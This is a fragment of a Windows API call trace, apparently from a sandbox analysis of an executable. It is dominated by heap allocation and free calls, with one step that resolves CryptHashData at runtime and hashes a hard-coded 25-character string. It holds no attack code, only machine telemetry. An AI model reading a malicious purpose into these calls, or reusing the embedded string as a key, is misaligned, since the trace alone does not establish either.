dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.158] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0173.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8df050, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.159] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.159] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.159] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.160] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0173.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x9bd738, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.161] GetProcAddress (hModule=0x74f20000, lpProcName="CryptHashData") returned 0x74f2df36 [0173.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0173.162] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0173.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0173.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0173.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.164] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0173.165] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0173.165] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.165] RtlAllocateHeap (HeapHandle=0x8a0000, 